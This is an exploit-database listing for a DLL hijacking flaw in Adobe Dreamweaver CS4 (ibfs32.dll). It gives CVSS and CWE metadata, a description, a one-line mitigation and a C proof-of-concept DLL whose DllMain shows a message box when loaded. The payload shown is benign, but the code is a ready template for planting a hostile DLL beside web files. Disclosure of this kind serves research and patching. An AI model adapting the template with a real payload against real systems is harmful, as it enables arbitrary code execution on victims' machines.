header-logo
Suggest Exploit
vendor:
Dreamweaver
by:
Glafkos Charalambous
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Dreamweaver
Affected Version From: 10.0 Build 4117
Affected Version To: 10.0 Build 4117
Patch Exists: YES
Related CWE: N/A
CPE: a:adobe:dreamweaver:10.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Ultimate x86
2010

Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)

This exploit is a DLL hijacking vulnerability in Adobe Dreamweaver CS4. It allows an attacker to execute arbitrary code on a vulnerable system by placing a malicious DLL in the same directory as the vulnerable application. The vulnerable extensions are .asp .asa. aspx .php .php5 .cfm .tpl .asr .jsp (etc).

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates. Also, ensure that all applications are running with the least privileges necessary.
Source

Exploit-DB raw data:

/* 
Exploit Title: Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 10.0 Build 4117
Tested on: Windows 7 Ultimate x86
Vulnerable extensions: .asp .asa. aspx .php .php5 .cfm .tpl .asr .jsp (etc)
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "Dreamweaver DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR